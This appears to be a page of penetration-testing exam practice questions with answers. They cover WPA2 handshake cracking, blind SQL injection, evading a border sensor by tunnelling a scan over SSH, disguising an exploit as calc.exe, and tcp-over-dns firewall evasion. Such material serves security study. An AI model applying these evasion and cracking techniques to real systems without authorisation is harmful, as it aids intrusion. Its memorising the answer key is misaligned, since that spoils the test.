During a wireless penetration test, a tester detects an access point using WPA2 encryption. Which of the following attacks should be used to obtain the key? A. The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard B. The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain the key C. The tester must use the tool inSSIDer to crack it using the ESSID of the network D. The tester must capture the WPA2 authentication handshake and then crack it
D. The tester must capture the WPA2 authentication handshake and then crack it
What is the main difference between a "Normal" SQL injection and a "Blind" SQL Injection vulnerability? A. The request tot he web server is not visible to the administrator of the vulnerable application B. The successful attack does not show an error message to the administrator of the affected application C. The attack is called "Blind" because, although the application properly filters user input, it is still vulnerable to code injection D. The vulnerable application does not display errors with information about the injection results to the attacker
D. The vulnerable application does not display errors with information about the injection results to the attacker
Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common? A. They are written in Java B. They send alerts to security monitors C. They use the same packet analysis engine D. They use the same packet capture utility
D. They use the same packet capture utility
A penetration tester is attempting to scan an internal corporate network from the internet without alerting the border senor. Which is the most efficient technique should the tester consider using? A. Spoofing an IP address B. Scanning using fragmented IP packets C. Tunneling over high port numbers D. Tunneling scan over SSH
D. Tunneling scan over SSH
One advantage of an application-level firewall is the ability to A. monitor tcp handshaking B. retain state information for each packet C. filter packets at the network level D. filter specific commands, such as http:post
D. filter specific commands, such as http:post
An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to compile the newest C++ exploit and name it calc.exe. Which command would the engineer use to accomplish this? A. g++ hackersExploit.py -o calc.exe B. g++ --compile -i hackersExploit.cpp -o calc.exe C. g++ -i hackersExploit.pl -o calc.exe D. g++ hackersExploit.cpp -o calc.exe
D. g++ hackersExploit.cpp -o calc.exe
Which of the following is a client-server tool utilized to evade firewall inspection? A. nikto B. hping C. kismet D. tcp-over-dns
D. tcp-over-dns